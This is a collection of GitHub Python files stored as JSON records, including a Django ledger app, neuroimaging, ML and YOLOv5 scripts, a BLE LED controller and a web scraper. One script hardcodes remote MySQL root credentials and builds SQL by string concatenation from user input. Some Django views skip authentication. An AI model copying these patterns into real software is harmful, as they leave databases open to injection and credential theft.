p.page(page_num)\r\n except EmptyPage:\r\n page = p.page(1)\r\n\r\n context = {'dealer':dealer,'orderedledger':page,'pk':pk}\r\n return render(request, 'ledger/dealer.html', context)\r\n\r\n@login_required(login_url='loginuser')\r\n@allowed_users(allowed_roles=['admin'])\r\ndef dealerform(request):\r\n if request.method == 'GET':\r\n return render(request, 'ledger/dealerform.html', {'form':DealerForm()})\r\n else:\r\n form = DealerForm(request.POST)\r\n if form.is_valid():\r\n form.save()\r\n return redirect('home')\r\n\r\n@login_required(login_url='loginuser')\r\ndef userpage(request):\r\n try :\r\n userobjects = ViewDealer.objects.get(user=request.user)\r\n dealerallowed = userobjects.dealer.all()\r\n except :\r\n context = {\"message\": \"No dealers allowed to view\"}\r\n return render(request, 'ledger/user.html', context)\r\n # list l is storing data of all allowed dealer and their ledgers\r\n l = []\r\n for d in dealerallowed:\r\n dict = {}\r\n dict[\"name\"] = d.name\r\n dict[\"address\"] = d.address\r\n dict[\"mobile\"] = d.mob_num\r\n dict['dealerid'] = d.id\r\n #leg list for storing ledgers of the current iterating dealer\r\n leg = []\r\n bn = BrandNew.objects.get(dealer = d.id)\r\n led_number = bn.ledger_number\r\n k = 0\r\n while(k!=30):\r\n try:\r\n led = Ledger.objects.get(dealer = d,dealer_ledger_number = led_number-k)\r\n leg.append(led)\r\n except:\r\n break\r\n k += 1\r\n dict[\"ledger\"] = leg\r\n l.append(dict)\r\n if len(dealerallowed) == 0:\r\n context = {\"message\": \"No dealers allowed to view\"}\r\n else:\r\n context = {\"ledgers\":l}\r\n return render(request, 'ledger/user.html', context)\r\n\r\ndef roadexpense(request):\r\n if request.method == 'GET':\r\n user = request.user\r\n form = RoadExpenseForm(initial={\"user\":user},instance=user)\r\n return render(request, 'ledger/expense.html', {'form':form})\r\n else:\r\n form = RoadExpenseForm(request.POST)\r\n if form.is_valid():\r\n form.save()\r\n return redirect('home')\r\n\r\n\r\n\r\n# report to be converted into pdf from html\r\n@login_required(login_url='loginuser')\r\n@allowed_users(allowed_roles=['admin'])\r\ndef dailytrans(request):\r\n return render(request,'ledger/dailytrans.html')\r\n\r\n\r\n\r\n\r\n# AUTHENTICATION FUNCTIONS\r\n\r\n@unauthenticated_user\r\ndef loginuser(request):\r\n if request.method == 'POST':\r\n username=request.POST['username']\r\n password=request.POST['password']\r\n user = authenticate(username=request.POST['username'],password=request.POST['password'])\r\n if user is None:\r\n print(\"I'm In\")\r\n print(AuthenticationForm())\r\n return render(request, 'ledger/login.html', {'form':AuthenticationForm(), 'error': 'Username or Password did not match'})\r\n else:\r\n login(request, user)\r\n return redirect('home')\r\n else:\r\n return render(request, 'ledger/login.html', {'form':AuthenticationForm()})\r\n\r\n\r\ndef logoutuser(request):\r\n if request.method == 'POST':\r\n logout(request)\r\n return redirect('loginuser')\r\n\r\ndef cheque_alter(request,ledger_no,pk):\r\n dealer = Dealer.objects.get(id = pk)\r\n led = Ledger.objects.get(dealer_ledger_number = ledger_no,dealer = dealer.id)\r\n val = led.isChequeCleared\r\n led.isChequeCleared = not val\r\n led.save()\r\n return redirect('dealer',pk)\r\n","repo_name":"shlok1805/web-ledger","sub_path":"ledger/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"33120719631","text":"\"\"\"\n===================\nCoregistration demo\n===================\n\nThis example shows a basic coregistration step from anatomical to mean\nfunctional.\n\"\"\"\n# Create a memory context\nfrom nipype.caching import Memory\nmem = Memory('/tmp')\n\n# Compute mean functional\nfrom procasl import preprocessing\naverage = mem.cache(preprocessing.Average)\nout_average = average(in_file='/tmp/func.nii')\nmean_func = out_average.outputs.mean_file\n\n# Coregister anat to mean functional\nfrom nipype.interfaces import spm\ncoregister = mem.cache(spm.Coregister)\nout_coregister = coregister(\n target=mean_func,\n source='/tmp/anat.nii',\n write_interp=3)\n\n# Check coregistration\nimport matplotlib.pylab as plt\nfrom nilearn import plotting\nfigure = plt.figure(figsize=(5, 4))\ndisplay = plotting.plot_anat(mean_func, figure=figure, display_mode='z',\n cut_coords=(-7, 32),\n title='anat edges on mean functional')\ndisplay.add_edges(out_coregister.outputs.coregistered_source)\nfigure.suptitle('Impact of tagging correction')\nplt.show()\n","repo_name":"salma1601/process-asl-old","sub_path":"examples/plot_heroes_coregister.py","file_name":"plot_heroes_coregister.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41395127175","text":"with open(\"input.txt\") as datafile:\r\n data = [line.strip() for line in datafile.readlines()]\r\n\r\netd = int(data[0])\r\nbuses = set(data[1].split(\",\"))\r\nbuses.remove(\"x\")\r\n\r\nminwait = etd\r\nmybus = 0\r\n\r\nfor bus in buses:\r\n if int(bus) - (etd % int(bus)) < minwait:\r\n minwait = int(bus) - etd % int(bus)\r\n mybus = int(bus)\r\n\r\nprint(minwait * mybus)","repo_name":"Trainpants/Advent","sub_path":"2020/Day13/Day13P1.py","file_name":"Day13P1.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25880070757","text":"import threading\nimport time\ndef s1():\n print('start s1')\n time.sleep(3.5)\n print('finish s1')\n\ndef s2():\n print('start s2')\n time.sleep(3)\n print('finish s2')\n\ndef main():\n print('start main')\n t1 = threading.Thread(target=s1)\n # 将t1设置为守护线程,注意,设置守护线程需要在开始线程之前\n t1.setDaemon(True)\n # 还可这样设置\n # ti.daemon = True\n t1.start()\n\n t2 = threading.Thread(target=s2)\n t2.start()\n\n print('finish main')\n\nif __name__ == '__main__':\n main()","repo_name":"kyle-liu007/PythonStudy","sub_path":"多线程/e3.py","file_name":"e3.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18023861198","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn import datasets\nimport sys\nimport MySQLdb\n\ndb = MySQLdb.connect(host=\"ec2-52-37-241-124.us-west-2.compute.amazonaws.com\", # your host, usually localhost\n user=\"root\", # your username\n passwd=\"password\", # your password\n db=\"credit_data\") # name of the data base\n\n# you must create a Cursor object. It will let\n# you execute all the queries you need\ncur = db.cursor()\n\n# Use all the SQL you like\n\n\ntotal = len(sys.argv)\n\ncmdargs = str(sys.argv)\n\nmyprediction = list()\n\n#for i in range(1,total):\n # myprediction.append(int(sys.argv[i]))\n\nquery=\"INSERT INTO credit_predict (`Male` ,`Age` ,`Debt` ,`Married` ,`EducationLevel` ,`Ethnicity` ,`YearsEmployed` ,`PriorDefault` ,`Employed`,`CreditScore` ,`DriversLicense` ,`Citizen` ,`ZipCode` ,`Income` ,`Prediction` ) VALUES( \"\n\nfor i in range(1,total):\n\tmyprediction.append(int(sys.argv[i]))\n\tquery+=str(sys.argv[i])+\",\"\n#print(query+\");\")\n\ndata = pd.read_csv(\"Credit_clean.csv\",header = 0)\n\ndata_set = data[data.columns[0:14]]\n\ntarget_set = data[data.columns[14]]\n\ntarget = np.array(target_set).astype(int)\n\nclf = DecisionTreeClassifier()\n\nclf = clf.fit(data_set,target_set)\n\nX=myprediction\n\nY=np.array(X).reshape((1,-1))\n\npredict=clf.predict(Y)\n\nif(predict[len(predict)-1]==1):\n print(\"YES\")\nelse:\n print(\"NO\")\n\nquery+=str(predict[len(predict)-1])\nquery+=\");\"\n#print(query)\n\ncur.execute(query);\ndb.commit()\ndb.close()\n","repo_name":"knightswatch3/FinCal","sub_path":"scikitscripts/credit_approval_prediction.py","file_name":"credit_approval_prediction.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21152861210","text":"import struct,os\ndef getBFLIMSWIZZLE(fn):\n fp = open(fn , \"rb\")\n fp.seek(-5,2)\n SWIZZLE = ord(fp.read(1))\n SWIZZLE = (SWIZZLE - 4 )/ 0x20\n fp.close()\n return SWIZZLE\n\nos.system(\"AMDCompressCLI.exe -fd BC4 \\\"inPNG\\\\image__titlelogowindwakermask_00^s.bflim.gtx.dds.PNG\\\" \\\"inDDS\\\\image__titlelogowindwakermask_00^s.bflim.gtx.dds\\\"\")\n\n\n\nfl = os.listdir(\"inDDS\")\nfor fn in fl:\n print(fn.split(\".\")[0])\n SWIZZLE = getBFLIMSWIZZLE(fn.split(\".\")[0].replace(\"__\" , \"\\\\\") + \".bflim\")\n print(SWIZZLE)\n os.system(\"TexConv2.exe -i \\\"inDDS\\%s\\\" -o \\\"inGTX\\%s.gtx\\\" -swizzle %d\"%(fn ,fn.split(\".\")[0] , SWIZZLE))\n\n","repo_name":"wmltogether/BlackWaterUnpacker","sub_path":"BlackWaterUnpacker/image_tool/runDDS2GTX.py","file_name":"runDDS2GTX.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"21297123135","text":"from jax import numpy as jnp\nimport numpy as np\nfrom jax import grad, jit \nimport time\n\nsigmoid = lambda x: 1 / (1+jnp.exp(-x))\nce_loss = lambda y_tgts, y_pred: -jnp.mean( y_tgts * jnp.log(y_pred)\\\n + (1-y_tgts) * jnp.log(1-y_pred))\n\ndef forward(x, w):\n\n x = jnp.tanh(jnp.matmul(x,w[0]))\n x = sigmoid(jnp.matmul(x,w[1]))\n\n return x\n\n@jit\ndef get_loss(x, w, y_tgts):\n\n y_pred = forward(x, w)\n\n return ce_loss(y_tgts, y_pred)\n\nget_grad = grad(get_loss, argnums=(1))\njit_grad = jit(get_grad)\n\nif __name__ == \"__main__\":\n\n x = np.random.randn(1024,128)\n y_tgts = np.random.randint(2, size=(1024,1))\n\n w0 = 1e-2 * np.random.randn(128,128)\n w1 = 1e-2 * np.random.randn(128,1)\n w = [w0,w1]\n\n t0 = time.time()\n for ii in range(10000):\n\n my_grad = get_grad(x,w, y_tgts)\n\n\n for idx, grads in enumerate(my_grad):\n w[idx] -= 1e-2 * grads\n\n if ii % 100 == 0:\n loss = get_loss(x, w, y_tgts)\n print(loss)\n\n t00 = time.time()\n\n w0 = 1e-2 * np.random.randn(128,128)\n w1 = 1e-2 * np.random.randn(128,1)\n w = [w0,w1]\n\n t1 = time.time()\n jit_get_loss = jit(get_loss)\n for jj in range(10000):\n\n my_grad = jit_grad(x, w, y_tgts)\n\n for idx, grads in enumerate(my_grad):\n w[idx] -= 1e-2 * grads\n\n if jj % 100 == 0:\n loss = get_loss(x, w, y_tgts)\n print(loss)\n\n\n t2 = time.time()\n\n print(\"loop execution time: {:.2f} s, time with jit: {:.2f} s\".format(t00-t0, t2-t1))\n\n","repo_name":"riveSunder/MLPDialects","sub_path":"jax_nn2.py","file_name":"jax_nn2.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"7002164456","text":"import numpy as np\r\nimport torch\r\nimport cv2\r\nfrom yolov5.models.experimental import attempt_load\r\nfrom yolov5.utils.augmentations import letterbox\r\nfrom yolov5.utils.general import check_img_size, non_max_suppression, scale_coords\r\nfrom yolov5.utils.torch_utils import select_device\r\n\r\n\r\nclass YOLOv5(object):\r\n # 参数设置\r\n _defaults = {\r\n \"weights\": \"../yolov5s.pt\",\r\n \"imgsz\": 640,\r\n \"iou_thres\": 0.45,\r\n \"conf_thres\": 0.25,\r\n \"classes\": 0 # 只检测人\r\n }\r\n\r\n @classmethod\r\n def get_defaults(cls, n):\r\n if n in cls._defaults:\r\n return cls._defaults[n]\r\n else:\r\n return \"Unrecognized attribute name '\" + n + \"'\"\r\n\r\n # 初始化操作,加载模型\r\n def __init__(self, device='0', **kwargs):\r\n self.__dict__.update(self._defaults)\r\n self.device = select_device(device)\r\n self.half = self.device != \"cpu\"\r\n\r\n self.model = attempt_load(self.weights, map_location=self.device) # load FP32 model\r\n self.imgsz = check_img_size(self.imgsz, s=self.model.stride.max()) # check img_size\r\n if self.half:\r\n self.model.half() # to FP16\r\n\r\n # 推理部分\r\n def infer(self, inImg):\r\n # 使用letterbox方法将图像大小调整为640大小\r\n img = letterbox(inImg, new_shape=self.imgsz)[0]\r\n\r\n # 归一化与张量转换\r\n img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416\r\n img = np.ascontiguousarray(img)\r\n img = torch.from_numpy(img).to(self.device)\r\n img = img.half() if self.half else img.float() # uint8 to fp16/32\r\n img /= 255.0 # 0 - 255 to 0.0 - 1.0\r\n if img.ndimension() == 3:\r\n img = img.unsqueeze(0)\r\n\r\n # 推理\r\n pred = self.model(img, augment=True)[0]\r\n # NMS\r\n pred = non_max_suppression(pred, self.conf_thres, self.iou_thres, classes=self.classes, agnostic=True)\r\n\r\n bbox_xyxy = []\r\n confs = []\r\n cls_ids = []\r\n\r\n # 解析检测结果\r\n for i, det in enumerate(pred): # detections per image\r\n if det is not None and len(det):\r\n # 将检测框映射到原始图像大小\r\n det[:, :4] = scale_coords(img.shape[2:], det[:, :4], inImg.shape).round()\r\n # 保存结果\r\n for *xyxy, conf, cls in reversed(det):\r\n bbox_xyxy.append(xyxy)\r\n confs.append(conf.item())\r\n cls_ids.append(int(cls.item()))\r\n\r\n xyxys = torch.Tensor(bbox_xyxy)\r\n confss = torch.Tensor(confs)\r\n cls_ids = torch.Tensor(cls_ids)\r\n\r\n return xyxys, confss, cls_ids\r\n\r\n\r\nif __name__ == '__main__':\r\n yolov5_obj = YOLOv5()\r\n im = cv2.imread(\"../../data/images/zidane.jpg\") # image :是返回提取到的图片的值\r\n\r\n res = yolov5_obj.infer(im)\r\n print(res)\r\n","repo_name":"justinge/demo1","sub_path":"yolov5/utils/flask_rest_api/Yolov5.py","file_name":"Yolov5.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19809206128","text":"# (c) 2020 ARTEMES INTERNATIONAL, LLC.\n# WWW.MAISONARTEMES.COM\nimport board\nimport neopixel\nimport touchio\nimport adafruit_fancyled.adafruit_fancyled as fancy\nfrom adafruit_bluefruit_connect.packet import Packet\nfrom adafruit_bluefruit_connect.button_packet import ButtonPacket\nfrom adafruit_bluefruit_connect.color_packet import ColorPacket\nfrom adafruit_ble import BLERadio\nfrom adafruit_ble.advertising.standard import ProvideServicesAdvertisement\nfrom adafruit_ble.services.nordic import UARTService\n\nNUM_LEDS = 20 # number of ring LEDs\nRIGHT_PIN = board.A1 # wiring\nLEFT_PIN = board.A6\nCPX_PIN = board.D8 # CPX Neopixels D8\n\ntouch_A2 = touchio.TouchIn(board.A2)\ntouch_A3 = touchio.TouchIn(board.A3)\ntouch_A4 = touchio.TouchIn(board.A4)\ntouch_A5 = touchio.TouchIn(board.A5)\ntouch_TX = touchio.TouchIn(board.TX)\n\n# Online/Sync Mode\nPALETTE_ARTEMES = [fancy.CRGB(0.0, 0.3, 0.7), # Blue\n fancy.CRGB(0.0, 0.0, 1.0), # Blue\n fancy.CRGB(27, 20, 100)]\n # fancy.CRGB(95, 39, 205)] Purple\n\n# Torch Mode\nPALETTE_TORCH = [fancy.CRGB(255, 255, 255)] # White\n\n# Off Mode\nPALETTE_OFF = [fancy.CRGB(0, 0, 0)] # Black\n\n# Alert Mode\nPALETTE_ALERT = [fancy.CRGB(255, 0, 0), # Red\n fancy.CRGB(0, 0, 0),\n fancy.CRGB(234, 65, 0)] # Red\n\nright = neopixel.NeoPixel(RIGHT_PIN, NUM_LEDS, brightness=1.0, auto_write=False)\nleft = neopixel.NeoPixel(LEFT_PIN, NUM_LEDS, brightness=1.0, auto_write=False)\ncpx = neopixel.NeoPixel(CPX_PIN, NUM_LEDS, brightness=1.0, auto_write=False)\n\noffset = 0 # color spin\noffset_increment = 1\nOFFSET_MAX = 1000000\n\n# BLE\nble = BLERadio()\nuart = UARTService()\nadvertisement = ProvideServicesAdvertisement(uart)\n\ndef set_palette(palette):\n for i in range(NUM_LEDS):\n color = fancy.palette_lookup(palette, (offset + i) / NUM_LEDS)\n color = fancy.gamma_adjust(color, brightness=1.0)\n right[i] = color.pack()\n right.show()\n\n for i in range(NUM_LEDS):\n color = fancy.palette_lookup(palette, (offset + i) / NUM_LEDS)\n color = fancy.gamma_adjust(color, brightness=1.0)\n left[i] = color.pack()\n left.show()\n\n for i in range(NUM_LEDS):\n color = fancy.palette_lookup(palette, (offset + i) / NUM_LEDS)\n color = fancy.gamma_adjust(color, brightness=1.0)\n cpx[i] = color.pack()\n cpx.show()\n\n# palette on startup\npalette_choice = PALETTE_ARTEMES\n\n# palette cycling\ncycling = True\n\n# advertising?\nadvertising = False\n\nwhile True:\n\n if cycling:\n set_palette(palette_choice)\n offset = (offset + offset_increment) % OFFSET_MAX\n\n if not ble.connected and not advertising:\n ble.start_advertising(advertisement)\n advertising = True\n\n # connected via Bluetooth\n if ble.connected:\n advertising = False\n if uart.in_waiting:\n packet = Packet.from_stream(uart)\n if isinstance(packet, ColorPacket):\n cycling = False\n # Set all pixels to one color\n right.fill(packet.color)\n left.fill(packet.color)\n cpx.fill(packet.color)\n right.show()\n left.show()\n cpx.show()\n elif isinstance(packet, ButtonPacket):\n cycling = True\n if packet.pressed:\n if packet.button == ButtonPacket.BUTTON_1:\n palette_choice = PALETTE_OFF\n elif packet.button == ButtonPacket.BUTTON_2:\n palette_choice = PALETTE_TORCH\n elif packet.button == ButtonPacket.BUTTON_3:\n palette_choice = PALETTE_ALERT\n offset_increment = 6\n elif packet.button == ButtonPacket.BUTTON_4:\n palette_choice = PALETTE_ARTEMES\n offset_increment = 1\n\n # animation speed\n elif packet.button == ButtonPacket.UP:\n offset_increment += 1\n elif packet.button == ButtonPacket.DOWN:\n offset_increment -= 1\n\n if touch_A2.value:\n cycling = True\n palette_choice = PALETTE_OFF\n elif touch_A3.value:\n cycling = True\n palette_choice = PALETTE_TORCH\n elif touch_A4.value:\n cycling = True\n palette_choice = PALETTE_ALERT\n offset_increment = 6\n elif touch_A5.value:\n cycling = True\n palette_choice = PALETTE_ARTEMES\n offset_increment = 1\n","repo_name":"ArtemesIntl/ArtemesSyncNotifs","sub_path":"artemes_sync_notifs.py","file_name":"artemes_sync_notifs.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32444986082","text":"from rest_framework import serializers\n\nfrom api.models import Request\n\n\nclass RequestSerializer(serializers.ModelSerializer):\n class Meta:\n model = Request\n fields = ('id', 'date', 'method', 'endpoint', 'response_code',\n 'exec_time', 'remote_address', 'body_request',)\n","repo_name":"gurupratap-matharu/midware","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33911856700","text":"#!/usr/bin/env python3\nfrom urllib.request import Request, urlopen\nimport urllib.error\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime as dtime\nfrom datetime import timedelta\nimport os\nimport re\nimport sys\nimport time\nimport threading, time\nimport pandas as pd\n\n__version__ = 'v1.00'\nboardUrl = \"https://www.clien.net/service/board/park/\"\n\ndefaultFile = 'default.csv'\ncheckName = os.path.dirname(os.path.realpath(__file__)) + '/' + defaultFile \nmutexFile = os.path.dirname(os.path.realpath(__file__)) + '/mutexFile'\n\ndefaultId = 13351150 #처음 시작할 게시물 ID 지정 필요\n\nbuzzCheckDuration = 360 #in minutes 한 게시물에서생성 후 대기 시간\n\ndef getMutex():\n with open(mutexFile, 'r') as f:\n line = f.readline()\n if 'FALSE' in line:\n pass\n else:\n print(\"Failed to get mutex. File was already locked.\")\n return False\n\n with open(mutexFile, 'w') as f:\n f.write(str(os.getpid()))\n\n with open(mutexFile, 'r') as f:\n line = int(f.readline())\n if line == os.getpid():\n pass\n else:\n print(\"Failed to get mutex. Another process just locked.\")\n return False\n \n return True\n \ndef releaseMutex():\n with open(mutexFile, 'w') as f:\n f.write('FALSE')\n \ndef getNowTime():\n nowTime = dtime.now()\n return nowTime.strftime(\"%Y-%m-%d %H:%M:%S\")\n\ndef getLastedIdFromCsvFile(csvFile):\n #print(\"we got %s\" % (csvFile))\n count=len(open(csvFile).readlines()) \n csvData = pd.read_csv(csvFile, skiprows=range(1,count-1))\n return int(csvData[ [\"id\"] ].values)\n\ndef getDate():\n nowTime = dtime.now()\n return nowTime.strftime(\"%Y-%m-%d\")\n\ndef getBsObj(addr):\n try:\n req = Request(addr, headers={'User-Agent': 'Mozilla/5.0'})\n except urllib.error.HTTPError as e:\n print(\"HTTP Error\")\n data = None\n except urllib.error.URLError as e:\n print(\"URLError Error\")\n data = None\n else:\n data = True\n \n if data is None:\n return data\n \n try:\n html = urlopen(req).read().decode('utf-8','replace')\n except urllib.error.HTTPError as e:\n print(\"HTTP Error\")\n data = None\n except urllib.error.URLError as e:\n print(\"URLError Error}\")\n data = None\n else:\n data = BeautifulSoup(html, \"html.parser\")\n \n return data\n\ndef getLastId():\n # a. 날짜로csv 파일명을 확인해서 파일명 존재시 마지막 row의ID 확인\n # b. 파일명이 없을 경우, defaultId (매뉴얼 지정)\n \n if(os.path.isfile(checkName)):\n lastId = getLastedIdFromCsvFile(checkName)\n else:\n print(\"There is no %s.\" % (checkName))\n lastId = defaultId\n\n return lastId\n\ndef getInfoBoard(id):\n # 어떤 게시판 정보를 가져와야하나\n # 1. 글 제목 - post_title\n # 2. 게제시간 - post_time\n # 3. 댓글 - post_reply\n # 4. 공감 - symph_count\n # 5. 조회수 - view_count\n targetUrl = boardUrl+str(id)\n\n check_time = dtime.now()\n\n bsObj = getBsObj(targetUrl)\n if bsObj is None:\n return None\n \n #print(\"boObj : %s\" % (bsObj))\n bsObj = bsObj.find('div', attrs={'class' : 'content_view'})\n if bsObj is None:\n return None\n #print(\"post_id : %d\" % (id))\n\n post_title = bsObj.find('h3', attrs={'class' : 'post_subject'}).get_text()\n post_title= post_title.replace('\\n', ' ').replace('\\r', '')\n #print(\"post_title : %s\" % (post_title))\n\n post_symph = bsObj.find('div', attrs={'class' : 'post_symph view_symph'})\n if post_symph is None:\n post_symph = 0\n else:\n post_symph = bsObj.find('div', attrs={'class' : 'post_symph view_symph'}).get_text()\n post_symph = (int)(post_symph.replace('\\n', ' ').replace('\\r', ''))\n #print(\"post_symph : %d\" % (post_symph))\n\n post_view = bsObj.find('div', attrs={'class' : 'view_info'}).get_text()\n post_view = (int)(post_view.replace('\\n', ' ').replace('\\r', '').replace(',', ''))\n #print(\"post_view : %d\" % (post_view))\n\n tmp = bsObj.find('div', attrs={'class' : 'post_author'})\n tmp = tmp.find_all('span')\n post_time = (tmp[0].get_text())\n post_time = (post_time.replace('\\n', ' ').replace('\\r', '').replace('\\t', ''))\n post_time = (post_time.strip())\n post_time = post_time[:19]\n #수정일이 있을 경우, 뒤 부분 삭제.\n # ex) 2018-12-29 17:19:36 수정일 : 2018-12-29 17:19:41\n post_time = dtime.strptime(post_time, '%Y-%m-%d %H:%M:%S')\n #print(\"post_time : %s\" % post_time)\n\n post_reply= bsObj.find('div', attrs={'class' : 'comment_head'}).get_text()\n post_reply= (post_reply.replace('\\n', ' ').replace('\\r', '').replace(',', ''))\n post_reply= (int)(re.findall('\\d+', post_reply)[0])\n #print(\"post_reply: %d\" % (post_reply))\n\n delta_time = ((check_time - post_time).total_seconds())/60\n\n print(\"This delta_time is %s.\" % delta_time)\n\n result = { \"id\" : [id], \"post_time\" : [post_time], \"check_time\" : [check_time], \"delta_time\" : [delta_time], \"view\" : [post_view],\"reply\" : [post_reply], \"symph\" : [post_symph], \"title\" : [post_title] }\n result_df = pd.DataFrame(result)\n return result_df\n\nclass site_scraper():\n def __init__(self):\n self.pdResult = pd.DataFrame(columns=(\"id\", \"post_time\", \"check_time\", \"delta_time\", \"view\", \"reply\", \"symph\", \"title\"))\n\n def scraping(self):\n try:\n self.pdThisId = getInfoBoard(self.boardId)\n except:\n print(\"Unhandling Exception Occured - scraping\")\n self.pdThisId = None\n\n def concatPd(self):\n self.pdResult = self.pdResult.append(self.pdThisId, ignore_index=True,\n sort=False)\n\n def concatCsvFile(self):\n if os.path.isfile(checkName):\n print(\"File %s is exist.\" % checkName)\n csvFileData = pd.read_csv(checkName, index_col=0, header=0)\n #print(self.pdResult)\n csvFileData = csvFileData.append(self.pdResult,\n ignore_index=True, sort=False)\n csvFileData.to_csv(checkName, mode='w')\n else:\n self.pdResult.to_csv(checkName, mode='w')\n\n def checkLongerThan(self):\n \n if self.pdThisId is None:\n return None\n \n post = (self.pdThisId[\"post_time\"].ix[0])\n check = (self.pdThisId[\"check_time\"].ix[0])\n deltaMin = timedelta(minutes=buzzCheckDuration)\n deltaTime = post+deltaMin\n\n if check > deltaTime:\n return True\n else:\n return False\n\nif __name__ == '__main__':\n print(\"\\n[Start][%s] %s %s [pid:%d] is going to work.\"\n % (getNowTime(),os.path.realpath(__file__),__version__,os.getpid()))\n\n if(getMutex()):\n pass\n else:\n sys.exit()\n\n keepGoing = True\n lastId = getLastId()\n httpError = 0\n scraper = site_scraper()\n\n while keepGoing:\n # Step 1. 게시물 ID 확인 \n # a. 날짜로csv 파일명을 확인해서 파일명 존재시 마지막 row의ID 확인\n # b. 파일명이 없을 경우, 현재 게시물의 첫글로 초기화(이제부터 시작)\n thisId = lastId + 1\n print(\"\\nThis id : %d - [%s]\" % (thisId, getNowTime()))\n scraper.boardId = thisId\n\n # Step 2. 확인한 게시물 ID의 +1 게시글을 읽어서 확인\n # a. 정해진 시간(ex. 6hour) 보다 오래되었으면 정보를 csv에 저장\n # b. 정해진 시간을 안넘겼으면 그대로 out 종료\n scraper.scraping()\n\n ret = scraper.checkLongerThan()\n if ret is None:\n print(\"Id : %d is HTTPError 404 or was deleted by the web manager..\" % thisId)\n httpError = httpError + 1\n if httpError > 30:\n print(\"httpError count is %d. We're going out.\" % httpError)\n keepGoing = False\n elif ret:\n print(\"Id : %d is longer than buzzCheckDuration.\" % thisId)\n scraper.concatPd()\n httpError = 0\n else:\n print(\"Id : %d is short than buzzCheckDuration.\" % thisId)\n keepGoing = False\n \n lastId = thisId\n\n scraper.concatCsvFile()\n\n print(\"[End][%s] main function is going out.\" % getNowTime())\n\n releaseMutex()\n sys.exit()\n","repo_name":"devinlife/buzz_clien_appendix","sub_path":"11_top100_project/01_happen_yesterday.py","file_name":"01_happen_yesterday.py","file_ext":"py","file_size_in_byte":8331,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"73962232053","text":"from django import forms\n\nfrom .models import User, Vacation\n\n\nclass ProfileUpdateForm(forms.ModelForm):\n \"\"\"Форма для страницы профиля\"\"\"\n email = forms.EmailField(label=\"E-MAIL\")\n\n class Meta:\n model = User\n fields = [\"first_name\", \"last_name\", \"email\", \"position\"]\n\n\nclass VacationUpdateForm(forms.ModelForm):\n \"\"\"Форма для страницы отпусков\"\"\"\n vacation_date_start = forms.DateField(\n label=\"Начало отпуска\",\n widget=forms.DateInput(attrs={\"class\": \"form-control\", \"type\": \"date\"}),\n )\n vacation_date_end = forms.DateField(\n label=\"Конец отпуска\",\n widget=forms.DateInput(attrs={\"class\": \"form-control\", \"type\": \"date\"}),\n )\n\n class Meta:\n model = Vacation\n fields = [\"vacation_date_start\", \"vacation_date_end\"]\n\n def clean(self):\n # Определяем правило валидации\n if self.cleaned_data.get(\"vacation_date_end\") < self.cleaned_data.get(\n \"vacation_date_start\"\n ):\n raise forms.ValidationError(\n \"Дата окончания отпуска должна быть больше даты начала\"\n )\n return self.cleaned_data\n","repo_name":"LevityLoveLight/django_crm_test_project","sub_path":"vacation_service/users/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31353214783","text":"#Given: Two DNA strings s and t of equal length\r\n#Return: The Hamming distance dH(s,t)\r\n\r\ndef calcpoints(seq1, seq2):\r\n \"\"\"Counts symbol substitutions between 2 strings (Hamming distance)\"\"\"\r\n\r\n count = 0\r\n \r\n for ind in range(len(seq1)):\r\n if seq1[ind] != seq2[ind]:\r\n count += 1\r\n \r\n return count\r\n\r\nwith open('../Files/rosalind_bio_HAMM.txt', 'r') as myfile:\r\n strands = myfile.read().splitlines()\r\n\r\ns = strands[0]\r\nt = strands[1]\r\n\r\nprint(calcpoints(s, t))\r\n","repo_name":"agolikova/Rosalind-Bioinformatics-Solutions","sub_path":"Code/HAMM_Counting point mutations.py","file_name":"HAMM_Counting point mutations.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"33790836295","text":"import os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\" # Or 2, 3, etc. other than 0\n\nimport tensorflow as tf\nfrom keras.backend.tensorflow_backend import set_session\nconfig = tf.ConfigProto()\nconfig = tf.ConfigProto(\n gpu_options=tf.GPUOptions(\n visible_device_list=\"0\", # specify GPU number\n allow_growth=True\n )\n)\nconfig.gpu_options.allow_growth = True # dynamically grow the memory used on the GPU\nsess = tf.Session(config=config)\nset_session(sess) # set this TensorFlow session as the default session for Keras\n\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom local_utils import detect_lp\nfrom os.path import splitext,basename\nfrom keras.models import model_from_json,load_model\nimport glob\nimport 